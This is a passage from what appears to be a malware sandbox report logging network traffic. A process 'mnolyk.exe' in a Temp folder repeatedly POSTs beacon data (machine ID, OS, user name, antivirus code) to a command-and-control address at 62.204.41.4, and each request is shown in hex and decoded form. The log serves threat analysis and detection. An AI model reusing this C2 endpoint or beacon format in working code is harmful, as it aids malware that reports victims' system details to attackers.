                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:16.240391970 CET439INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:16 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          299192.168.2.65002262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:16.443010092 CET440OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:16.506484032 CET440INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:16 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          3192.168.2.64972162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:51.504070997 CET100OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:51.568952084 CET108INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          30192.168.2.64974862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:58.128864050 CET135OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:58.193397999 CET135INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:58 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          300192.168.2.65002362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:16.679938078 CET441OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:16.744438887 CET441INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:16 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          301192.168.2.65002462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:16.923135042 CET442OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:16.985208035 CET442INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:16 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          302192.168.2.65002562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:17.165507078 CET443OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:17.231359959 CET443INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          303192.168.2.65002662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:17.408057928 CET444OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:17.471838951 CET444INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          304192.168.2.65002762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:17.657150984 CET445OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:17.719563007 CET445INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          305192.168.2.65002862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:17.895695925 CET446OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:17.959394932 CET446INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          306192.168.2.65002962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:18.139693022 CET447OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:18.205637932 CET447INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:18 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          307192.168.2.65003062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:18.384403944 CET448OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:18.449120998 CET448INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:18 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          308192.168.2.65003162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:18.637614012 CET449OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:18.702125072 CET449INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:18 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          309192.168.2.65003262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:18.890388012 CET450OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:18.954585075 CET450INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:18 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          31192.168.2.64974962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:58.376847982 CET136OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:58.441658020 CET136INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:58 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          310192.168.2.65003362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:19.127548933 CET451OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:19.192739964 CET451INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:19 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          311192.168.2.65003462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:19.362339020 CET452OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:19.426523924 CET452INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:19 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          312192.168.2.65003562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:19.615797997 CET453OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:19.678596020 CET453INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:19 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          313192.168.2.65003662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:19.847585917 CET454OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:19.911933899 CET454INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:19 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          314192.168.2.65003762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:20.092570066 CET455OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:20.157129049 CET455INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          315192.168.2.65003862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:20.336643934 CET456OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:20.399569988 CET456INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          316192.168.2.65003962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:20.584894896 CET457OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
